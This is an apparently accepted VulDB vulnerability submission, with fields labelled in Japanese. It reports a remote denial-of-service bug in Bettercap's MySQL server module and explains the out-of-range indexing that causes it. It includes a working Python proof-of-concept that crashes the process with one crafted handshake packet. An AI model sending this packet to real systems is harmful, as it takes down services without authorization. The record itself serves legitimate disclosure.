| タイトル | Bettercap <=v2.41.5 Integer Coercion Error |
|---|
| 説明 | mysql.server crashes entire Bettercap process on crafted client handshake leading to remote DoS.
<summary>Full debug output</summary>
```
[mysql.server] server starting on address 192.168.1.x:3306
[mysql.server] connection from 192.168.1.y
panic: runtime error: index out of range [8] with length 8
goroutine 53 [running]:
github.com/bettercap/bettercap/v2/modules/mysql_server.(*MySQLServer).Start.func1()
.../modules/mysql_server/mysql_server.go:133 +0x1051
created by github.com/bettercap/bettercap/v2/session.(*SessionModule).SetRunning in goroutine 1
.../session/module.go:268 +0x17f
```
</details>
### Steps to Reproduce
1. Start bettercap with `mysql.server` active:
```
sudo bettercap -iface eth0 -eval "mysql.server on"
```
2. Confirm it is listening on port 3306:
```
ss -tlnp | grep 3306
```
3. From any machine on the network, send a MySQL client handshake response where **byte 5 (the high byte of the capability flags) is `0x00`**:
```python
import socket, time
s = socket.socket()
s.connect(("192.168.1.x", 3306))
s.recv(4096) # read server greeting
pkt = bytearray(50)
pkt[0] = 0x2e # packet length
pkt[3] = 0x01 # sequence
pkt[4] = 0x03 # capability flags low byte (value = 3)
pkt[5] = 0x00 # capability flags high byte ← triggers crash
pkt[9] = 0x01 # max packet size
pkt[10] = 0x21 # charset
pkt[35:40] = b"root\x00"
s.sendall(bytes(pkt))
time.sleep(1)
s.close()
```
4. Observe bettercap crash immediately. Port 3306 stops accepting connections.
**Expected behavior:** Malformed or minimal capability flags are handled gracefully; the connection is closed with an error; bettercap keeps running.
**Actual behavior:** `mysql_server.go` line 133 formats the capability value as a binary string and immediately indexes position 8:
```go
// line 132
capabilities := fmt.Sprintf("%08b", int(uint32(readBuffer[4]) | uint32(readBuffer[5])<<8))
// line 133
loadData := string(capabilities[8])
```
When `readBuffer[5]` is `0x00` the combined value is ≤ 255. `fmt.Sprintf("%08b", ...)` produces **exactly 8 characters** for values 0–255. Indexing `capabilities[8]` on a length-8 string panics:
```
panic: runtime error: index out of range [8] with length 8
```
The connection handler runs inside the module's main goroutine with no `recover()`, so the panic propagates and terminates the **entire bettercap process**. Any unauthenticated client on the network can trigger this with a single ~50-byte packet. |
|---|
| ソース | ⚠️ https://github.com/bettercap/bettercap/issues/1265 |
|---|
| ユーザー | dapickle (UID 97309) |
|---|
| 送信 | 2026年04月23日 08:57 (1 月 ago) |
|---|
| モデレーション | 2026年05月10日 18:05 (17 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 362573 [bettercap 迄 2.41.5 MySQL Server mysql_server.go サービス拒否] |
|---|
| ポイント | 20 |
|---|